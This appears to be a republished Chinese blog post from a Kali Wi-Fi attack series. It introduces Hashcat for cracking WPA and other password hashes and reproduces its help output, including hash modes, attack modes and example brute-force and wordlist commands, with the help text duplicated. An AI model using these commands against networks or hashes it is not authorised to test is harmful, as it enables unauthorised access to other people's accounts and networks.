Kali-WIFI攻防(七)----WPA密码破解之Hashcat

公众号_码农致富
2,456 阅读50分钟
原文链接: blog.csdn.net

一、工具简介


Hashcat系列软件是比较牛逼的密码破解软件,HashCat主要分为三个版本:Hashcat、oclHashcat-plus、oclHashcat-lite。这三个版本的主要区别是:HashCat只支持CPU破解。oclHashcat-plus支持使用GPU破解多个HASH,并且支持的算法高达77种, oclHashcat-lite只支持使用GPU对单个HASH进行破解,支持的HASH种类仅有32种,但是对算法进行了优化,可以达到GPU破解的最高速度。如果只有单个密文进行破解的话,推荐使用oclHashCat-lite。


所需硬件及系统平台


 HashCat系列软件在硬件上支持使用CPU、NVIDIA GPU、ATI GPU来进行密码破解。在操作系统上支持Windows、Linux平台,并且需要安装官方指定版本的显卡驱动程序,如果驱动程序版本不对,可能导致程序无法运行。


    如果要搭建多GPU破解平台的话,最好是使用Linux系统来运行HashCat系列软件,因为在windows下,系统最多只能识别4张显卡。并且,Linux下的VisualCL技术(关于如何搭建VisualCL环境,请参考官方文档hashcat.net/wiki/doku.p…),可以轻松的将几台机器连接起来,进行分布式破解作业。 在破解速度上,ATI GPU破解速度最快,使用单张HD7970破解MD5可达到9000M/s的速度,其次为NVIDIA显卡,同等级显卡GTX690破解速度大约为ATI显卡的三分之一,速度最慢的是使用CPU进行破解。 


看下他的参数:


hashcat  --help                 #查看帮助文档

[html] view plain copy print?
  1. root@kali:~# hashcat --help  
  2. hashcat, advanced password recovery  
  3.   
  4. Usage: hashcat [options]... hash|hashfile|hccapfile [dictionary|mask|directory]...  
  5.   
  6. - [ 选项 ] -  
  7.   
  8.  选项 Short / Long             | Type | 描述                                                 | 例子  
  9. ===============================+======+======================================================+=======================  
  10.  -m, --hash-type               | Num  | Hash-type, see references below                      | -m 1000  
  11.  -a, --attack-mode             | Num  | Attack-mode, see references below                    | -a 3  
  12.  -V, --version                 |      | Print version                                        |  
  13.  -h, --help                    |      | Print help                                           |  
  14.      --quiet                   |      | Suppress output                                      |  
  15.      --hex-charset             |      | Assume charset is given in hex                       |  
  16.      --hex-salt                |      | Assume salt is given in hex                          |  
  17.      --hex-wordlist            |      | Assume words in wordlist is given in hex             |  
  18.      --force                   |      | Ignore warnings                                      |  
  19.      --status                  |      | Enable automatic update of the status-screen         |  
  20.      --status-timer            | Num  | Sets seconds between status-screen update to X       | --status-timer= 1  
  21.      --machine-readable        |      | Display the status view in a machine readable format |  
  22.      --loopback                |      | Add new plains to induct directory                   |  
  23.      --weak-hash-threshold     | Num  | Threshold X when to stop checking for weak hashes    | --weak= 0  
  24.      --markov-hcstat           | File | Specify hcstat file to use                           | --markov-hc= my.hcstat  
  25.      --markov-disable          |      | Disables markov-chains, emulates classic brute-force |  
  26.      --markov-classic          |      | Enables classic markov-chains, no per-position       |  
  27.  -t, --markov-threshold        | Num  | Threshold X when to stop accepting new markov-chains | -t 50  
  28.      --runtime                 | Num  | Abort session after X seconds of runtime             | --runtime= 10  
  29.      --session                 | Str  | Define specific session name                         | --session= mysession  
  30.      --restore                 |      | Restore session from --session                       |  
  31.      --restore-disable         |      | Do not write restore file                            |  
  32.  -o, --outfile                 | File | Define outfile for recovered hash                    | -o outfile.txt  
  33.      --outfile-format          | Num  | Define outfile-format X for recovered hash           | --outfile-format= 7  
  34.      --outfile-autohex-disable |      | Disable the use of $HEX[] in output plains           |  
  35.      --outfile-check-timer     | Num  | Sets seconds between outfile checks to X             | --outfile-check= 30  
  36.  -p, --separator               | Char | Separator char for hashlists and outfile             | -p :  
  37.      --stdout                  |      | Do not crack a hash, instead print candidates only   |  
  38.      --show                    |      | Compare hashlist with potfile; Show cracked hashes   |  
  39.      --left                    |      | Compare hashlist with potfile; Show uncracked hashes |  
  40.      --username                |      | Enable ignoring of usernames in hashfile             |  
  41.      --remove                  |      | Enable remove of hash once it is cracked             |  
  42.      --remove-timer            | Num  | Update input hash file each X seconds                | --remove-timer= 30  
  43.      --potfile-disable         |      | Do not write potfile                                 |  
  44.      --potfile-path            | Dir  | Specific path to potfile                             | --potfile-path= my.pot  
  45.      --debug-mode              | Num  | Defines the debug mode (hybrid only by using rules)  | --debug-mode= 4  
  46.      --debug-file              | File | Output file for debugging rules                      | --debug-file= good.log  
  47.      --induction-dir           | Dir  | Specify the induction directory to use for loopback  | --induction= inducts  
  48.      --outfile-check-dir       | Dir  | Specify the outfile directory to monitor for plains  | --outfile-check-dir= x  
  49.      --logfile-disable         |      | Disable the logfile                                  |  
  50.      --truecrypt-keyfiles      | File | Keyfiles used, separate with comma                   | --truecrypt-key= x.png  
  51.      --veracrypt-keyfiles      | File | Keyfiles used, separate with comma                   | --veracrypt-key= x.txt  
  52.      --veracrypt-pim           | Num  | VeraCrypt personal iterations multiplier             | --veracrypt-pim= 1000  
  53.  -b, --benchmark               |      | Run benchmark                                        |  
  54.  -c, --segment-size            | Num  | Sets size in MB to cache from the wordfile to X      | -c 32  
  55.      --bitmap-min              | Num  | Sets minimum bits allowed for bitmaps to X           | --bitmap-min= 24  
  56.      --bitmap-max              | Num  | Sets maximum bits allowed for bitmaps to X           | --bitmap-min= 24  
  57.      --cpu-affinity            | Str  | Locks to CPU devices, separate with comma            | --cpu-affinity= 1,2,3  
  58.      --opencl-platforms        | Str  | OpenCL platforms to use, separate with comma         | --opencl-platforms= 2  
  59.  -d, --opencl-devices          | Str  | OpenCL devices to use, separate with comma           | -d 1  
  60.  -D, --opencl-device-types     | Str  | OpenCL device-types to use, separate with comma      | -D 1  
  61.      --opencl-vector-width     | Num  | Manual override OpenCL vector-width to X             | --opencl-vector= 4  
  62.  -w, --workload-profile        | Num  | Enable a specific workload profile, see pool below   | -w 3  
  63.  -n, --kernel-accel            | Num  | Manual workload tuning, set outerloop step size to X | -n 64  
  64.  -u, --kernel-loops            | Num  | Manual workload tuning, set innerloop step size to X | -u 256  
  65.      --nvidia-spin-damp        | Num  | Workaround NVidias CPU burning loop bug, in percent  | --nvidia-spin-damp= 50  
  66.      --gpu-temp-disable        |      | Disable temperature and fanspeed reads and triggers  |  
  67.      --gpu-temp-abort          | Num  | Abort if GPU temperature reaches X degrees celsius   | --gpu-temp-abort= 100  
  68.      --gpu-temp-retain         | Num  | Try to retain GPU temperature at X degrees celsius   | --gpu-temp-retain= 95  
  69.      --powertune-enable        |      | Enable power tuning, restores settings when finished |  
  70.      --scrypt-tmto             | Num  | Manually override TMTO value for scrypt to X         | --scrypt-tmto= 3  
  71.  -s, --skip                    | Num  | Skip X words from the start                          | -s 1000000  
  72.  -l, --limit                   | Num  | Limit X words from the start + skipped words         | -l 1000000  
  73.      --keyspace                |      | Show keyspace base:mod values and quit               |  
  74.  -j, --rule-left               | Rule | Single rule applied to each word from left wordlist  | -j 'c'  
  75.  -k, --rule-right              | Rule | Single rule applied to each word from right wordlist | -k '^-'  
  76.  -r, --rules-file              | File | Multiple rules applied to each word from wordlists   | -r rules/best64.rule  
  77.  -g, --generate-rules          | Num  | Generate X random rules                              | -g 10000  
  78.      --generate-rules-func-min | Num  | Force min X funcs per rule                           |  
  79.      --generate-rules-func-max | Num  | Force max X funcs per rule                           |  
  80.      --generate-rules-seed     | Num  | Force RNG seed set to X                              |  
  81.  -1, --custom-charset1         | CS   | User-defined charset ?1                              | -1 ?l?d?u  
  82.  -2, --custom-charset2         | CS   | User-defined charset ?2                              | -2 ?l?d?s  
  83.  -3, --custom-charset3         | CS   | User-defined charset ?3                              |  
  84.  -4, --custom-charset4         | CS   | User-defined charset ?4                              |  
  85.  -i, --increment               |      | Enable mask increment mode                           |  
  86.      --increment-min           | Num  | Start mask incrementing at X                         | --increment-min= 4  
  87.      --increment-max           | Num  | Stop mask incrementing at X                          | --increment-max= 8  
  88.   
  89. - [ 哈希模式 ] -  
  90.   
  91.       # | Name                                             | 类别  
  92.   ======+==================================================+======================================  
  93.     900 | MD4                                              | Raw Hash  
  94.       0 | MD5                                              | Raw Hash  
  95.    5100 | Half MD5                                         | Raw Hash  
  96.     100 | SHA1                                             | Raw Hash  
  97.   10800 | SHA-384                                          | Raw Hash  
  98.    1400 | SHA-256                                          | Raw Hash  
  99.    1700 | SHA-512                                          | Raw Hash  
  100.    5000 | SHA-3(Keccak)                                    | Raw Hash  
  101.   10100 | SipHash                                          | Raw Hash  
  102.    6000 | RipeMD160                                        | Raw Hash  
  103.    6100 | Whirlpool                                        | Raw Hash  
  104.    6900 | GOST R 34.11-94                                  | Raw Hash  
  105.   11700 | GOST R 34.11-2012 (Streebog) 256-bit             | Raw Hash  
  106.   11800 | GOST R 34.11-2012 (Streebog) 512-bit             | Raw Hash  
  107.      10 | md5($pass.$salt)                                 | Raw Hash, Salted and / or Iterated  
  108.      20 | md5($salt.$pass)                                 | Raw Hash, Salted and / or Iterated  
  109.      30 | md5(unicode($pass).$salt)                        | Raw Hash, Salted and / or Iterated  
  110.      40 | md5($salt.unicode($pass))                        | Raw Hash, Salted and / or Iterated  
  111.    3800 | md5($salt.$pass.$salt)                           | Raw Hash, Salted and / or Iterated  
  112.    3710 | md5($salt.md5($pass))                            | Raw Hash, Salted and / or Iterated  
  113.    2600 | md5(md5($pass)                                   | Raw Hash, Salted and / or Iterated  
  114.    4300 | md5(strtoupper(md5($pass)))                      | Raw Hash, Salted and / or Iterated  
  115.    4400 | md5(sha1($pass))                                 | Raw Hash, Salted and / or Iterated  
  116.     110 | sha1($pass.$salt)                                | Raw Hash, Salted and / or Iterated  
  117.     120 | sha1($salt.$pass)                                | Raw Hash, Salted and / or Iterated  
  118.     130 | sha1(unicode($pass).$salt)                       | Raw Hash, Salted and / or Iterated  
  119.     140 | sha1($salt.unicode($pass))                       | Raw Hash, Salted and / or Iterated  
  120.    4500 | sha1(sha1($pass)                                 | Raw Hash, Salted and / or Iterated  
  121.    4700 | sha1(md5($pass))                                 | Raw Hash, Salted and / or Iterated  
  122.    4900 | sha1($salt.$pass.$salt)                          | Raw Hash, Salted and / or Iterated  
  123.    1410 | sha256($pass.$salt)                              | Raw Hash, Salted and / or Iterated  
  124.    1420 | sha256($salt.$pass)                              | Raw Hash, Salted and / or Iterated  
  125.    1430 | sha256(unicode($pass).$salt)                     | Raw Hash, Salted and / or Iterated  
  126.    1440 | sha256($salt.unicode($pass))                     | Raw Hash, Salted and / or Iterated  
  127.    1710 | sha512($pass.$salt)                              | Raw Hash, Salted and / or Iterated  
  128.    1720 | sha512($salt.$pass)                              | Raw Hash, Salted and / or Iterated  
  129.    1730 | sha512(unicode($pass).$salt)                     | Raw Hash, Salted and / or Iterated  
  130.    1740 | sha512($salt.unicode($pass))                     | Raw Hash, Salted and / or Iterated  
  131.      50 | HMAC-MD5 (key = $pass)                           | Raw Hash, Authenticated  
  132.      60 | HMAC-MD5 (key = $salt)                           | Raw Hash, Authenticated  
  133.     150 | HMAC-SHA1 (key = $pass)                          | Raw Hash, Authenticated  
  134.     160 | HMAC-SHA1 (key = $salt)                          | Raw Hash, Authenticated  
  135.    1450 | HMAC-SHA256 (key = $pass)                        | Raw Hash, Authenticated  
  136.    1460 | HMAC-SHA256 (key = $salt)                        | Raw Hash, Authenticated  
  137.    1750 | HMAC-SHA512 (key = $pass)                        | Raw Hash, Authenticated  
  138.    1760 | HMAC-SHA512 (key = $salt)                        | Raw Hash, Authenticated  
  139.     400 | phpass                                           | Generic KDF  
  140.    8900 | scrypt                                           | Generic KDF  
  141.   11900 | PBKDF2-HMAC-MD5                                  | Generic KDF  
  142.   12000 | PBKDF2-HMAC-SHA1                                 | Generic KDF  
  143.   10900 | PBKDF2-HMAC-SHA256                               | Generic KDF  
  144.   12100 | PBKDF2-HMAC-SHA512                               | Generic KDF  
  145.      23 | Skype                                            | Network protocols  
  146.    2500 | WPA/WPA2                                         | Network protocols  
  147.    4800 | iSCSI CHAP authentication, MD5(Chap)             | Network protocols  
  148.    5300 | IKE-PSK MD5                                      | Network protocols  
  149.    5400 | IKE-PSK SHA1                                     | Network protocols  
  150.    5500 | NetNTLMv1                                        | Network protocols  
  151.    5500 | NetNTLMv1 + ESS                                  | Network protocols  
  152.    5600 | NetNTLMv2                                        | Network protocols  
  153.    7300 | IPMI2 RAKP HMAC-SHA1                             | Network protocols  
  154.    7500 | Kerberos 5 AS-REQ Pre-Auth etype 23              | Network protocols  
  155.    8300 | DNSSEC (NSEC3)                                   | Network protocols  
  156.   10200 | Cram MD5                                         | Network protocols  
  157.   11100 | PostgreSQL CRAM (MD5)                            | Network protocols  
  158.   11200 | MySQL CRAM (SHA1)                                | Network protocols  
  159.   11400 | SIP digest authentication (MD5)                  | Network protocols  
  160.   13100 | Kerberos 5 TGS-REP etype 23                      | Network protocols  
  161.     121 | SMF (Simple Machines Forum)                      | Forums, CMS, E-Commerce, Frameworks  
  162.     400 | phpBB3                                           | Forums, CMS, E-Commerce, Frameworks  
  163.    2611 | vBulletin <  v3.8.5                               | Forums, CMS, E-Commerce, Frameworks  
  164.    2711 | vBulletin > v3.8.5                               | Forums, CMS, E-Commerce, Frameworks  
  165.    2811 | MyBB                                             | Forums, CMS, E-Commerce, Frameworks  
  166.    2811 | IPB (Invison Power Board)                        | Forums, CMS, E-Commerce, Frameworks  
  167.    8400 | WBB3 (Woltlab Burning Board)                     | Forums, CMS, E-Commerce, Frameworks  
  168.      11 | Joomla <  2.5.18                                  | Forums, CMS, E-Commerce, Frameworks  
  169.     400 | Joomla > 2.5.18                                  | Forums, CMS, E-Commerce, Frameworks  
  170.     400 | Wordpress                                        | Forums, CMS, E-Commerce, Frameworks  
  171.    2612 | PHPS                                             | Forums, CMS, E-Commerce, Frameworks  
  172.    7900 | Drupal7                                          | Forums, CMS, E-Commerce, Frameworks  
  173.      21 | osCommerce                                       | Forums, CMS, E-Commerce, Frameworks  
  174.      21 | xt:Commerce                                      | Forums, CMS, E-Commerce, Frameworks  
  175.   11000 | PrestaShop                                       | Forums, CMS, E-Commerce, Frameworks  
  176.     124 | Django (SHA-1)                                   | Forums, CMS, E-Commerce, Frameworks  
  177.   10000 | Django (PBKDF2-SHA256)                           | Forums, CMS, E-Commerce, Frameworks  
  178.    3711 | Mediawiki B type                                 | Forums, CMS, E-Commerce, Frameworks  
  179.    7600 | Redmine                                          | Forums, CMS, E-Commerce, Frameworks  
  180.      12 | PostgreSQL                                       | Database Server  
  181.     131 | MSSQL(2000)                                      | Database Server  
  182.     132 | MSSQL(2005)                                      | Database Server  
  183.    1731 | MSSQL(2012)                                      | Database Server  
  184.    1731 | MSSQL(2014)                                      | Database Server  
  185.     200 | MySQL323                                         | Database Server  
  186.     300 | MySQL4.1/MySQL5                                  | Database Server  
  187.    3100 | Oracle H: Type (Oracle 7+)                       | Database Server  
  188.     112 | Oracle S: Type (Oracle 11+)                      | Database Server  
  189.   12300 | Oracle T: Type (Oracle 12+)                      | Database Server  
  190.    8000 | Sybase ASE                                       | Database Server  
  191.     141 | EPiServer 6.x <  v4                               | HTTP, SMTP, LDAP Server  
  192.    1441 | EPiServer 6.x > v4                               | HTTP, SMTP, LDAP Server  
  193.    1600 | Apache $apr1$                                    | HTTP, SMTP, LDAP Server  
  194.   12600 | ColdFusion 10+                                   | HTTP, SMTP, LDAP Server  
  195.    1421 | hMailServer                                      | HTTP, SMTP, LDAP Server  
  196.     101 | nsldap, SHA-1(Base64), Netscape LDAP SHA         | HTTP, SMTP, LDAP Server  
  197.     111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA      | HTTP, SMTP, LDAP Server  
  198.    1711 | SSHA-512(Base64), LDAP {SSHA512}                 | HTTP, SMTP, LDAP Server  
  199.   11500 | CRC32                                            | Checksums  
  200.    3000 | LM                                               | Operating-Systems  
  201.    1000 | NTLM                                             | Operating-Systems  
  202.    1100 | Domain Cached Credentials (DCC), MS Cache        | Operating-Systems  
  203.    2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2   | Operating-Systems  
  204.   12800 | MS-AzureSync PBKDF2-HMAC-SHA256                  | Operating-Systems  
  205.    1500 | descrypt, DES(Unix), Traditional DES             | Operating-Systems  
  206.   12400 | BSDiCrypt, Extended DES                          | Operating-Systems  
  207.     500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems  
  208.    3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems  
  209.    7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems  
  210.    1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems  
  211.     122 | OSX v10.4, OSX v10.5, OSX v10.6                  | Operating-Systems  
  212.    1722 | OSX v10.7                                        | Operating-Systems  
  213.    7100 | OSX v10.8, OSX v10.9, OSX v10.10                 | Operating-Systems  
  214.    6300 | AIX {smd5}                                       | Operating-Systems  
  215.    6700 | AIX {ssha1}                                      | Operating-Systems  
  216.    6400 | AIX {ssha256}                                    | Operating-Systems  
  217.    6500 | AIX {ssha512}                                    | Operating-Systems  
  218.    2400 | Cisco-PIX                                        | Operating-Systems  
  219.    2410 | Cisco-ASA                                        | Operating-Systems  
  220.     500 | Cisco-IOS $1$                                    | Operating-Systems  
  221.    5700 | Cisco-IOS $4$                                    | Operating-Systems  
  222.    9200 | Cisco-IOS $8$                                    | Operating-Systems  
  223.    9300 | Cisco-IOS $9$                                    | Operating-Systems  
  224.      22 | Juniper Netscreen/SSG (ScreenOS)                 | Operating-Systems  
  225.     501 | Juniper IVE                                      | Operating-Systems  
  226.    5800 | Android PIN                                      | Operating-Systems  
  227.   13800 | Windows 8+ phone PIN/Password                    | Operating-Systems  
  228.    8100 | Citrix Netscaler                                 | Operating-Systems  
  229.    8500 | RACF                                             | Operating-Systems  
  230.    7200 | GRUB 2                                           | Operating-Systems  
  231.    9900 | Radmin2                                          | Operating-Systems  
  232.     125 | ArubaOS                                          | Operating-Systems  
  233.    7700 | SAP CODVN B (BCODE)                              | Enterprise Application Software (EAS)  
  234.    7800 | SAP CODVN F/G (PASSCODE)                         | Enterprise Application Software (EAS)  
  235.   10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1              | Enterprise Application Software (EAS)  
  236.    8600 | Lotus Notes/Domino 5                             | Enterprise Application Software (EAS)  
  237.    8700 | Lotus Notes/Domino 6                             | Enterprise Application Software (EAS)  
  238.    9100 | Lotus Notes/Domino 8                             | Enterprise Application Software (EAS)  
  239.     133 | PeopleSoft                                       | Enterprise Application Software (EAS)  
  240.   13500 | PeopleSoft Token                                 | Enterprise Application Software (EAS)  
  241.   11600 | 7-Zip                                            | Archives  
  242.   12500 | RAR3-hp                                          | Archives  
  243.   13000 | RAR5                                             | Archives  
  244.   13200 | AxCrypt                                          | Archives  
  245.   13300 | AxCrypt in memory SHA1                           | Archives  
  246.   13600 | WinZip                                           | Archives  
  247.    62XY | TrueCrypt                                        | Full-Disk encryptions (FDE)  
  248.      X  | 1 =  PBKDF2-HMAC-RipeMD160                        | Full-Disk encryptions (FDE)  
  249.      X  | 2 =  PBKDF2-HMAC-SHA512                           | Full-Disk encryptions (FDE)  
  250.      X  | 3 =  PBKDF2-HMAC-Whirlpool                        | Full-Disk encryptions (FDE)  
  251.      X  | 4 =  PBKDF2-HMAC-RipeMD160 + boot-mode            | Full-Disk encryptions (FDE)  
  252.       Y | 1 =  XTS  512 bit pure AES                        | Full-Disk encryptions (FDE)  
  253.       Y | 1 =  XTS  512 bit pure Serpent                    | Full-Disk encryptions (FDE)  
  254.       Y | 1 =  XTS  512 bit pure Twofish                    | Full-Disk encryptions (FDE)  
  255.       Y | 2 =  XTS 1024 bit pure AES                        | Full-Disk encryptions (FDE)  
  256.       Y | 2 =  XTS 1024 bit pure Serpent                    | Full-Disk encryptions (FDE)  
  257.       Y | 2 =  XTS 1024 bit pure Twofish                    | Full-Disk encryptions (FDE)  
  258.       Y | 2 =  XTS 1024 bit cascaded AES-Twofish            | Full-Disk encryptions (FDE)  
  259.       Y | 2 =  XTS 1024 bit cascaded Serpent-AES            | Full-Disk encryptions (FDE)  
  260.       Y | 2 =  XTS 1024 bit cascaded Twofish-Serpent        | Full-Disk encryptions (FDE)  
  261.       Y | 3 =  XTS 1536 bit all                             | Full-Disk encryptions (FDE)  
  262.    8800 | Android FDE <  v4.3                               | Full-Disk encryptions (FDE)  
  263.   12900 | Android FDE (Samsung DEK)                        | Full-Disk encryptions (FDE)  
  264.   12200 | eCryptfs                                         | Full-Disk encryptions (FDE)  
  265.   137XY | VeraCrypt                                        | Full-Disk encryptions (FDE)  
  266.      X  | 1 =  PBKDF2-HMAC-RipeMD160                        | Full-Disk encryptions (FDE)  
  267.      X  | 2 =  PBKDF2-HMAC-SHA512                           | Full-Disk encryptions (FDE)  
  268.      X  | 3 =  PBKDF2-HMAC-Whirlpool                        | Full-Disk encryptions (FDE)  
  269.      X  | 4 =  PBKDF2-HMAC-RipeMD160 + boot-mode            | Full-Disk encryptions (FDE)  
  270.      X  | 5 =  PBKDF2-HMAC-SHA256                           | Full-Disk encryptions (FDE)  
  271.      X  | 6 =  PBKDF2-HMAC-SHA256 + boot-mode               | Full-Disk encryptions (FDE)  
  272.       Y | 1 =  XTS  512 bit pure AES                        | Full-Disk encryptions (FDE)  
  273.       Y | 1 =  XTS  512 bit pure Serpent                    | Full-Disk encryptions (FDE)  
  274.       Y | 1 =  XTS  512 bit pure Twofish                    | Full-Disk encryptions (FDE)  
  275.       Y | 2 =  XTS 1024 bit pure AES                        | Full-Disk encryptions (FDE)  
  276.       Y | 2 =  XTS 1024 bit pure Serpent                    | Full-Disk encryptions (FDE)  
  277.       Y | 2 =  XTS 1024 bit pure Twofish                    | Full-Disk encryptions (FDE)  
  278.       Y | 2 =  XTS 1024 bit cascaded AES-Twofish            | Full-Disk encryptions (FDE)  
  279.       Y | 2 =  XTS 1024 bit cascaded Serpent-AES            | Full-Disk encryptions (FDE)  
  280.       Y | 2 =  XTS 1024 bit cascaded Twofish-Serpent        | Full-Disk encryptions (FDE)  
  281.       Y | 3 =  XTS 1536 bit all                             | Full-Disk encryptions (FDE)  
  282.    9700 | MS Office <= 2003 $0|$1, MD5 + RC4               | Documents  
  283.    9710 | MS Office <= 2003 $0|$1, MD5 + RC4, collider #1  | Documents  
  284.    9720 | MS Office <= 2003 $0|$1, MD5 + RC4, collider #2  | Documents  
  285.    9800 | MS Office <= 2003 $3|$4, SHA1 + RC4              | Documents  
  286.    9810 | MS Office <= 2003 $3|$4, SHA1 + RC4, collider #1 | Documents  
  287.    9820 | MS Office <= 2003 $3|$4, SHA1 + RC4, collider #2 | Documents  
  288.    9400 | MS Office 2007                                   | Documents  
  289.    9500 | MS Office 2010                                   | Documents  
  290.    9600 | MS Office 2013                                   | Documents  
  291.   10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4)                    | Documents  
  292.   10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1       | Documents  
  293.   10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2       | Documents  
  294.   10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8)                    | Documents  
  295.   10600 | PDF 1.7 Level 3 (Acrobat 9)                      | Documents  
  296.   10700 | PDF 1.7 Level 8 (Acrobat 10 - 11)                | Documents  
  297.    9000 | Password Safe v2                                 | Password Managers  
  298.    5200 | Password Safe v3                                 | Password Managers  
  299.    6800 | Lastpass + Lastpass sniffed                      | Password Managers  
  300.    6600 | 1Password, agilekeychain                         | Password Managers  
  301.    8200 | 1Password, cloudkeychain                         | Password Managers  
  302.   11300 | Bitcoin/Litecoin wallet.dat                      | Password Managers  
  303.   12700 | Blockchain, My Wallet                            | Password Managers  
  304.   13400 | Keepass 1 (AES/Twofish) and Keepass 2 (AES)      | Password Managers  
  305.   
  306. - [ 导出的文件格式 ] -  
  307.   
  308.   # | 格式  
  309.  ===+========  
  310.   1 | hash[:salt]  
  311.   2 | plain  
  312.   3 | hash[:salt]:plain  
  313.   4 | hex_plain  
  314.   5 | hash[:salt]:hex_plain  
  315.   6 | plain:hex_plain  
  316.   7 | hash[:salt]:plain:hex_plain  
  317.   8 | crackpos  
  318.   9 | hash[:salt]:crack_pos  
  319.  10 | plain:crack_pos  
  320.  11 | hash[:salt]:plain:crack_pos  
  321.  12 | hex_plain:crack_pos  
  322.  13 | hash[:salt]:hex_plain:crack_pos  
  323.  14 | plain:hex_plain:crack_pos  
  324.  15 | hash[:salt]:plain:hex_plain:crack_pos  
  325.   
  326. - [ 规则的调试模式 ] -  
  327.   
  328.   # | Format  
  329.  ===+========  
  330.   1 | Finding-Rule  
  331.   2 | Original-Word  
  332.   3 | Original-Word:Finding-Rule  
  333.   4 | Original-Word:Finding-Rule:Processed-Word  
  334.   
  335. - [ 攻击模式 ] -  
  336.   
  337.   # | Mode  
  338.  ===+======  
  339.   0 | Straight                  (字典破解)  
  340.   1 | Combination               (组合破解)  
  341.   3 | Brute-force  
  342.   6 | Hybrid Wordlist + Mask    (掩码暴力破解)  
  343.   7 | Hybrid Mask + Wordlist      
  344.   
  345. - [ 内置的字符集 ] -  
  346.   
  347.   ? | Charset  
  348.  ===+=========  
  349.   l | abcdefghijklmnopqrstuvwxyz  
  350.   u | ABCDEFGHIJKLMNOPQRSTUVWXYZ  
  351.   d | 0123456789  
  352.   s |  !"#$%&'()*+,-./:;<= >?@[\]^_`{|}~  
  353.   a | ?l?u?d?s  
  354.   b | 0x00 - 0xff  
  355.   
  356. - [ OpenCL设备类型 ] -  
  357.   
  358.   # | Device Type  
  359.  ===+=============  
  360.   1 | CPU  
  361.   2 | GPU  
  362.   3 | FPGA, DSP, Co-Processor  
  363.   
  364. - [ 工作简介 ] -  
  365.   
  366.   # | Performance | Runtime | Power Consumption | Desktop Impact  
  367.  ===+=============+=========+===================+=================  
  368.   1 | Low         |   2 ms  | Low               | Minimal  
  369.   2 | Default     |  12 ms  | Economic          | Noticeable  
  370.   3 | High        |  96 ms  | High              | Unresponsive  
  371.   4 | Nightmare   | 480 ms  | Insane            | Headless  
  372.   
  373. - [ 基本的例子 ] -  
  374.   
  375.   Attack-          | Hash- |  
  376.   Mode             | Type  | Example command  
  377.  ==================+=======+==================================================================  
  378.   Wordlist         | $P$   | hashcat -a 0 -m 400 example400.hash example.dict  
  379.   Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule  
  380.   Brute-Force      | MD5   | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a  
  381.   Combinator       | MD5   | hashcat -a 1 -m 0 example0.hash example.dict example.dict  
  382.   
  383. If you still have no idea what just happened try following pages:  
  384.   
  385. * https://hashcat.net/wiki/#howtos_videos_papers_articles_etc_in_the_wild  
  386. * https://hashcat.net/wiki/#frequently_asked_questions  
root@kali:~# hashcat --help
hashcat, advanced password recovery

Usage: hashcat [options]... hash|hashfile|hccapfile [dictionary|mask|directory]...

- [ 选项 ] -

 选项 Short / Long             | Type | 描述                                                 | 例子
===============================+======+======================================================+=======================
 -m, --hash-type               | Num  | Hash-type, see references below                      | -m 1000
 -a, --attack-mode             | Num  | Attack-mode, see references below                    | -a 3
 -V, --version                 |      | Print version                                        |
 -h, --help                    |      | Print help                                           |
     --quiet                   |      | Suppress output                                      |
     --hex-charset             |      | Assume charset is given in hex                       |
     --hex-salt                |      | Assume salt is given in hex                          |
     --hex-wordlist            |      | Assume words in wordlist is given in hex             |
     --force                   |      | Ignore warnings                                      |
     --status                  |      | Enable automatic update of the status-screen         |
     --status-timer            | Num  | Sets seconds between status-screen update to X       | --status-timer=1
     --machine-readable        |      | Display the status view in a machine readable format |
     --loopback                |      | Add new plains to induct directory                   |
     --weak-hash-threshold     | Num  | Threshold X when to stop checking for weak hashes    | --weak=0
     --markov-hcstat           | File | Specify hcstat file to use                           | --markov-hc=my.hcstat
     --markov-disable          |      | Disables markov-chains, emulates classic brute-force |
     --markov-classic          |      | Enables classic markov-chains, no per-position       |
 -t, --markov-threshold        | Num  | Threshold X when to stop accepting new markov-chains | -t 50
     --runtime                 | Num  | Abort session after X seconds of runtime             | --runtime=10
     --session                 | Str  | Define specific session name                         | --session=mysession
     --restore                 |      | Restore session from --session                       |
     --restore-disable         |      | Do not write restore file                            |
 -o, --outfile                 | File | Define outfile for recovered hash                    | -o outfile.txt
     --outfile-format          | Num  | Define outfile-format X for recovered hash           | --outfile-format=7
     --outfile-autohex-disable |      | Disable the use of $HEX[] in output plains           |
     --outfile-check-timer     | Num  | Sets seconds between outfile checks to X             | --outfile-check=30
 -p, --separator               | Char | Separator char for hashlists and outfile             | -p :
     --stdout                  |      | Do not crack a hash, instead print candidates only   |
     --show                    |      | Compare hashlist with potfile; Show cracked hashes   |
     --left                    |      | Compare hashlist with potfile; Show uncracked hashes |
     --username                |      | Enable ignoring of usernames in hashfile             |
     --remove                  |      | Enable remove of hash once it is cracked             |
     --remove-timer            | Num  | Update input hash file each X seconds                | --remove-timer=30
     --potfile-disable         |      | Do not write potfile                                 |
     --potfile-path            | Dir  | Specific path to potfile                             | --potfile-path=my.pot
     --debug-mode              | Num  | Defines the debug mode (hybrid only by using rules)  | --debug-mode=4
     --debug-file              | File | Output file for debugging rules                      | --debug-file=good.log
     --induction-dir           | Dir  | Specify the induction directory to use for loopback  | --induction=inducts
     --outfile-check-dir       | Dir  | Specify the outfile directory to monitor for plains  | --outfile-check-dir=x
     --logfile-disable         |      | Disable the logfile                                  |
     --truecrypt-keyfiles      | File | Keyfiles used, separate with comma                   | --truecrypt-key=x.png
     --veracrypt-keyfiles      | File | Keyfiles used, separate with comma                   | --veracrypt-key=x.txt
     --veracrypt-pim           | Num  | VeraCrypt personal iterations multiplier             | --veracrypt-pim=1000
 -b, --benchmark               |      | Run benchmark                                        |
 -c, --segment-size            | Num  | Sets size in MB to cache from the wordfile to X      | -c 32
     --bitmap-min              | Num  | Sets minimum bits allowed for bitmaps to X           | --bitmap-min=24
